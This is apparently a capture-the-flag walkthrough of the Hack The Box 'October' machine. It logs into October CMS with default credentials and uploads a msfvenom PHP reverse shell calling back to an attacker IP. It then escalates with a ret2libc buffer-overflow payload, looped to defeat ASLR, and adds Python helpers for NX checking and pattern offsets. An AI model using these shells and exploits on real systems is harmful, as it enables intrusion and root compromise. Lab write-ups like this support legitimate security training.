October

Posted on March 5, 2020



References:
google-1
google-2
google-3

Port scan with zenmap

Directory scan with dirb

Visit:
http://10.10.10.16/backend/

Google: "october cms default login"
admin/admin

Generate a PHP reverse shell with msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.45 lport=4444 -f raw > shell.php5

Start the msf listener

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.45
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run

Media > Upload the file, then click the link to get a www-data shell

Get a TTY shell and look for SUID binaries; an interesting file turns up

meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null

Download it for analysis

meterpreter > download /usr/local/bin/ovrflw /root/Desktop


Look at the strings in the program

strings ovrflw


Check the binary's protections. NX is enabled, which means shellcode placed on the stack cannot be executed, so the overflow has to reuse existing code (ret2libc) instead.

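The NX check above is shown only as a screenshot. As an added example (not code from the original write-up), the following Python reads the ELF program headers directly and reports whether the PT_GNU_STACK entry marks the stack executable, which is what tools like checksec summarise as "NX enabled". The build_elf32_sample helper is an assumption made for this example: it constructs a minimal 32-bit ELF containing only that header so the check can run offline; on a real system pass a binary path on the command line instead.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551          # program header that records the stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4   # p_flags bits


def gnu_stack_flags(data):
    """Return p_flags of the PT_GNU_STACK header, or None if the binary has none."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    endian = "<" if data[5] == 1 else ">"
    if data[4] == 1:                                  # ELFCLASS32
        (e_phoff,) = struct.unpack_from(endian + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 42)
        # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        fmt, flags_idx = endian + "IIIIIIII", 6
    else:                                             # ELFCLASS64
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 54)
        # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        fmt, flags_idx = endian + "IIQQQQQQ", 1
    for i in range(e_phnum):
        ph = struct.unpack_from(fmt, data, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            return ph[flags_idx]
    return None


def stack_is_executable(data):
    """NX is off when PT_GNU_STACK carries PF_X, or when the header is missing
    (historically the Linux loader then falls back to an executable stack on x86)."""
    flags = gnu_stack_flags(data)
    return flags is None or bool(flags & PF_X)


def build_elf32_sample(stack_flags):
    """Constructed sample (assumption for this example): a minimal little-endian
    i386 ELF with a single program header. Not a runnable program, just enough
    header bytes to exercise the check."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9     # class32, LSB, version 1
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2, 3, 1,        # e_type=EXEC, e_machine=i386, e_version
        0, 52, 0, 0,    # e_entry, e_phoff (right after the 52-byte header), e_shoff, e_flags
        52, 32, 1,      # e_ehsize, e_phentsize, e_phnum
        40, 0, 0,       # e_shentsize, e_shnum, e_shstrndx
    )
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
    else:
        blob = build_elf32_sample(PF_R | PF_W)   # default: the constructed NX-enabled sample
    print("NX disabled (executable stack)" if stack_is_executable(blob) else "NX enabled")
```

Run it as `python3 nxcheck.py /path/to/ovrflw` to check a real binary; with no argument it evaluates the constructed sample. A missing PT_GNU_STACK is treated as executable on purpose, since that is the conservative reading for an audit.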

Use msf to generate a cyclic pattern as the input

cd /usr/share/metasploit-framework/tools/exploit/
./pattern_create.rb -l 150


Run it under gdb; the crash address is 0x64413764

gdb -q ovrflw
r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9


The return address is overwritten after 112 characters

./pattern_offset.rb -q 64413764 -l 150

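The two steps above (pattern_create.rb, then pattern_offset.rb on the faulting address) are shown only as tool invocations. As an added example that is not part of the original post, here is the same construction in Python: the pattern is built from unique (Upper, lower, digit) triples, and the crash value is decoded as little-endian bytes and located in the pattern, which reproduces the offset of 112 for 0x64413764. Function names are this example's own, not Metasploit's.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Same construction as Metasploit's pattern_create.rb: each 3-byte triple
    (Upper, lower, digit) is unique, so any 4-byte window identifies one position."""
    triples = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        triples.append(upper + lower + digit)
        if len(triples) * 3 >= length:
            break
    return "".join(triples)[:length]


def pattern_offset(crash_value, length=150):
    """Map a faulting register value back to its offset in the pattern.
    On a little-endian target the register holds the 4 pattern bytes reversed,
    so 0x64413764 is the byte sequence 64 37 41 64, i.e. the substring "d7Ad"."""
    pattern = pattern_create(length)
    for fmt in ("<I", ">I"):                  # try little-endian first, then big-endian
        needle = struct.pack(fmt, crash_value).decode("ascii", errors="replace")
        idx = pattern.find(needle)
        if idx >= 0:
            return idx
    return None                               # the value did not come from the pattern


if __name__ == "__main__":
    print(pattern_create(150))
    print(pattern_offset(0x64413764))         # 112, matching pattern_offset.rb -q 64413764
```

The little-endian decode is the part people get wrong by hand: the register shows 0x64413764, but the bytes that landed in memory read "d7Ad", and it is that substring whose position (112) gives the padding length used later.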

Debug with gdb on the target to find the libc addresses of system, exit and the "/bin/sh" string

gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb7610310, +99999999, "/bin/sh"
(gdb) x/s 0xb7732bac
(gdb) p exit

system: b75a5310
exit: b7598260
/bin/sh: b76c7bac
Online conversion tool: online-hex-converter

Little-endian format:
system: 10 53 5A B7
exit: 60 82 59 B7
/bin/sh: AC 7B 6C B7
"\x10\x53\x5A\xB7" + "\x60\x82\x59\xB7" + "\xAC\x7B\x6C\xB7"

Get a root shell. Because ASLR moves libc between runs, the addresses found above are only occasionally correct, so the loop simply keeps rerunning the binary until they line up.

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x53\x5A\xB7" + "\x60\x82\x59\xB7" + "\xAC\x7B\x6C\xB7"'); done

Get user.txt and root.txt



